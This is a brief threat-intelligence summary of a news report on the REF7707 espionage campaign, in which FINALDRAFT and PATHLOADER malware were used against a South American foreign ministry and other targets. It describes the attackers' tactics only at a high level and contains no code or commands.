Summary: A new espionage campaign targeting a South American foreign ministry and other entities has been detected, utilizing sophisticated malware capable of remote access. The campaign, tracked as REF7707 by Elastic Security Labs, involves the usage of tools like PATHLOADER and FINALDRAFT for executing commands and maintaining control. Researchers highlighted the campaign’s engineering quality alongside poor management practices by attackers.
Affected: South American foreign ministry, telecommunications entity, university in Southeast Asia
Keypoints :
- The campaign utilizes bespoke malware (FINALDRAFT) for remote administration and command-and-control operations.
- Attackers exploited valid network credentials for lateral movement and executed downloads via Microsoft’s certutil application.
- A Linux variant of the malware suggests a broader operational scope with similar command-and-control functionalities.
Source: https://thehackernews.com/2025/02/finaldraft-malware-exploits-microsoft.html